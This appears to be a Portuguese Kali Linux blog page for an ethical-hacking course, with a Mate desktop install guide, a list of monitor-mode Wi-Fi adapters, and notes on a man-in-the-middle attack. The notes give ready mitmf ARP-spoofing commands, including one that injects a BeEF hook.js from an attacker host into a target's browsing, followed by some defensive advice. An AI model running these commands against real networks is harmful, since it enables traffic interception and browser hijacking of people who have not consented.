Showing posts with label Kali_Linux_2017. Show all posts
Showing posts with label Kali_Linux_2017. Show all posts

Tuesday, May 8, 2018

desktop-base mate-desktop-environment

How to do it...

To configure the Mate environment follow the given steps:


We start by using the following command to install the Mate environment:

        apt-get install desktop-base mate-desktop-environment

The following screenshot shows the preceding command:



Type Y when it asks for confirmation on additional space requirements.

When installation is complete we will use the following command to set Mate as our default environment:

        update-alternatives --config x-session-manager

Choose the option mate-session (in our case 2) and press the Enter key:


Log out and log in again or restart and we will see the Mate environment:

Monday, August 14, 2017

Top Adaptadores USB / Dongles Kali Linux compatíveis - Monitor Mode - Hacker



Por WirelessHack | 15 de janeiro de 2017
Tradução e inserções de explicações - Afonso Alves
https://www.udemy.com/introducao-a-ethical-hacker/?instructorPreviewMode=guest 

Para fazer testes de penetração sem fio com o Kali Linux, é necessário um adaptador / dongle (dispositivo externo conectado a um computado) USB compatível para poder entrar no modo monitor, fazer injeções de pacotes ou ser capaz de fazer as coisas necessárias enquanto estamos fazendo pentesting.

Ao procurar um adaptador que funciona com o Kali, é o chipset do adaptador que lhe permite fazer os testes.

É o chipset do adaptador que controla se é compatível com o Kali. Muitos desses chipsets são instalados em diferentes adaptadores e vendidos. Então, se você encontrar um adaptador de marca com um chipset compatível com kali Linux e depois ver o mesmo chipset em outro adaptador USB genérico, provavelmente ele funcionará. Vou listar exemplos desta na parte inferior da página.

É melhor focar mais no chipset do que no nome do modelo do fornecedor.

Não compre um adaptador USB sem fio com a configuração G apenas. O G sem fio é inútil a menos que você esteja visando apenas roteadores e dispositivos G sem fio. O Wireless N é compatível com versões anteriores ( veja as tabelas de routeadores pela Net para entender melhor as novas versões que também incorporam o AC).
A maioria dos roteadores e dispositivos agora estão configurados com o Wireless N ou AC.

Outra coisa a ter em mente é o alcance do adaptador. Adaptadores USB pequenos são ótimos para manter o perfil baixo, mas sua faixa é limitada em comparação com um adaptador com uma antena 5 dbi ou 9 dbi maior.

Aqui estão os chipsets mais comuns usados com o Kali Linux. Qualquer adaptador USB que use esses chipsets provavelmente funcionará com o Kali.

Atheros AR9271
Ralink RT3070
Ralink RT3572
Realtek 8187L (adaptadores Wireless G)


ATUALIZAR
Existe um novo adaptador USB Pen Testing que funcionou muito bem chamado Panda PAU09.

É um dual-band 2.4 / 5 GHz wireless-N dongle que usa o Ralink RT5572.

Aqui estão os principais adaptadores USB sem fio compatíveis com Kali Linux com links para Amazon e AliExpress se disponíveis.

Adaptadores que usam o Chipset Ralink RT3070

Alfa AWUS036NH 2,4 GHz ....... Amazon
Alfa AWUS036NH 2,4 GHz ...... .AliExpress.com

Alfa AWUS036NEH 2,4 GHz ....... Amazon

Panda PAU05 2,4 GHz ....... Amazon


Adaptadores que usam o Chipset Atheros AR9271

Alfa AWUS036NHA ....... Amazon

TP-LINK TL-WN722N 2,4 GHz ....... (Versão 1 apenas, a Versão 2 não funciona)

Adaptador que usa o chipset RT3572

Alfa AWUS051NH banda dupla 2,4 GHz e 5,8 GHz ....... Amazon


Adaptadores USB G, chipset Realtek 8187L
Os seguintes adaptadores USB são dongles que eram os mais vendidos no passado, mas como eles apenas suportam G sem fio, eles se tornaram um pouco atrazados. 

Alfa AWUS036H Adaptador USB 2.4 GHz ....... Amazon
Alfa AWUS036H Adaptador USB 2.4 GHz ...... .AliExpress.com

Adaptador USB Netgear WG111v2 2.4 GHz ....... Amazon
Adaptador USB Sabrent NT-WGHU 2.4 GHz ....... Amazon

Adaptador barato de longo alcance que funciona com Kali
Aqui está um exemplo de um adaptador de longo alcance barato (48 dBi) que usa o chipset Ralink 3070 que funciona bem com o Kali. Ele tem problemas com qualquer versão do Windows que não é o Windows 7 e não funciona com Macs. 

Para adaptadores que tenham um bom suporte, vá com um dos adaptadores de marca e que tenha a N-N sem fio acima.
High Power SignalKing Signal King 48DBI ...... .AliExpress.com


References:
http://www.wirelesshack.org/top-kali-linux-compatible-usb-adapters-dongles-2015.html 
http://homenetworkadmin.com/wireless-b-vs-g-vs-n-vs-ac-difference/
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers&DokuWiki=mu18sdqh6i7po7c38k2rsa70d0#compatibility 
https://www.udemy.com/introducao-a-ethical-hacker/?instructorPreviewMode=guest
http://kennyvn.com/best-wireless-adapters-kali-linux/ 




Thursday, July 27, 2017

MITM ataque real – considerações

MITM ataque real – considerações
Verificar video no curso Introdução à Ética Hacker no site
https://www.udemy.com/introducao-a-ethical-hacker/?instructorPreviewMode=guest
Seção 7 - Network Penetration Test.
Afonso Alves

O texto abaixo são anotações que facilitam a fixação das sequências e configurações.

Redes reais - Certifique-se de especificar o IP certo e de estar na mesma rede do alvo.
Máquina Kali - rede nat desligada.
ifconfig para verificar isso.
Estou desligando-me na rede - problema de dns ou conexão muito lenta ou perda de conexão pode acontecer.
Desconecte-se da sua rede virtual seja bridge ou nat.
Dispositivos - rede - desmarque o adaptador de rede
Ifconfig etho não está conectado com a máquina principal - não podemos fazer ping
- Agora conectado à mesma máquina que você está atacando – ao roteador.
- Você não pode usar sua placa sem fio interna - apenas com external wireless.
- Conecte seu cartão sem fio - wlan0 - cartão sem fio - ainda não conectado.
- Precisamos nos conectar à mesma rede.
- Esta duas placas sem fio estão conectadas à mesma sub-rede ou subnet.
- Temos a chance de ver o Mac address do Router do alvo.
Comando  - mitmf -arp -spoof -i wlan0 -gateway 192.168.0.1 -target 192.168.0.19
- Estamos usando wlan0 - roteador de gateway e alvo
arp –a para checar se o arp address foi modificado
- A mudança leva tempo na camada de endereço MAC
- Mitmf está sniffing dados quando o alvo atualiza a primeira página após o comando ser executado.

Revisão
- Certifique-se de estar conectado à mesma rede
- Não usar bridge ou nat na sua máquina virtual
- Desligue sua máquina kali para a rede nat.
- A máquina Kali tem que ser isolada para conectar ao homem no meio
- Depois de terminar com isso, apenas conectar novamente ao seu adaptador de rede. Eth0 tem agora um endereço IP conectado ao seu computador.





Imagens:



Imagem da configuração necessária para acontecer o MITMf, você deve estar desconectado de sua máquina virtual.



Aqui o comando complete onde o que poderá mudar aqui no seu computador é o wlan0 fornecido pelo seu Kali e os dois IPs – um do Router/gateway e o outro do target/alvo.







Se o MITMf não estiver instalado, execute o comando abaixo.
Se a ferramenta MITMf não vem instalada com o Kali Linux. Ela deve ser instalado separadamente usando o seguinte comando:
apt-get install mitmf
Certifique-se de ter os repositórios corretos definidos no arquivo sources.list presente na pasta /etc/apt/ , uma vez que a instalação da ferramenta exigiria alguns arquivos adicionais para resolver o problema de dependências, que pode ser encontrado nos seguintes links:
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://http.kali.org/kali kali main non-free contrib
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
Uma vez instalada a ferramenta, identifique o endereço IP da vítima e o gateway padrão. A máquina Kali Linux atuará como o tráfego do homem-em-meio ao ataque e redireciona os dois pontos finais.
--- Daqui para frente é um complemento para entender que MITM pode ser feito de um outro jeito envolvendo outro programa que trabalharemos em outra aula, isto é, veremos na prática como fazer este gancho com um js(javaScript).
Injetando o gancho/hook BeEF usando MITM
O comando completo que executaria a falsificação de ARP e também configuraria MITMf para injetar o URL é mostrado da seguinte maneira:
mitmf -i eth0 --arp --spoof --gateway 192.168.1.123 --target 192.168.1.22 - inject -js-url http://192.168.1.70:3000/hook.js
Esse comando gerará a seguinte saída:

Assim que o cliente envia uma solicitação para uma página da Web, você verá alguma atividade gerada na interface da ferramenta. No painel BEEF UI, você encontrará o navegador on-line e pronto para ser assumido. Através do método MITM, você poderia injetar o gancho Beeb em todos os sites que você poderia pensar, assim recebendo dados que são enviados de volta do servidor, ainda mais que e o navegador do cliente não tem como identificar os dados injetados.

A única maneira de identificar se um gancho BeEF foi injetado no arquivo HTML no final do cliente é exibindo a fonte(código fonte) pressionando Ctrl + U no navegador. Quando o código abre em um editor de texto, Procure a palavra-chave hook.js (ou examine cuidadosamente todo o arquivo). Você certamente encontrará O URL do JavaScript injetado nela.

BeEF realiza a maior parte do ataque ao permanecer sob a superfície sem muita interação e envolvimento do usuário final. O navegador da Web é um software amplamente utilizado e as vulnerabilidades são descobertas diariamente, o que só aumenta a importância desta ferramenta em seu arsenal. A maioria dos módulos de ataque incluídos no BeEF usa JavaScript legítimo para consultar o navegador da Web e o sistema operacional. Embora o Chrome e o Internet Explorer tenham filtros anti-XSS, não são defesas infalíveis contra esses ataques.
A maneira de bloquear esses ataques é educando os usuários para ter cuidado ao navegar na internet e evitar visitar sites suspeitos. A maioria desses ataques começa por uma campanha de phishing tentando atrair o usuário a visitar o site injetado com o gancho Beeb. Você também precisa desinfetar os sites da sua organização de todos os XSS e falhas de injeção ou seu próprio site poderá ter o gancho BeEF injetado. Para o ataque baseado em MITM, certifique-se de que a camada de rede esteja corretamente segura, ou então você terá maiores problemas nas suas mãos do que apenas uma injeção no site com o gancho do Beeb.

Referencias:
Penetration Testing: A Survival Guide.2016 Packt Publishing. Authors:Wolf Halton, Bo Weaver, Juned Ahmed Ansari, Srinivasa Rao Kotipalli,Mohammed A. Imran.


The Nexus of Policy and Technology: An Expert Report on Allegations of Political Bias in Gmail's Spam Filtering

  Executive Summary: The Nexus of Policy and Technology The Federal Trade Commission (FTC) has initiated a new wave of regulatory scrutiny a...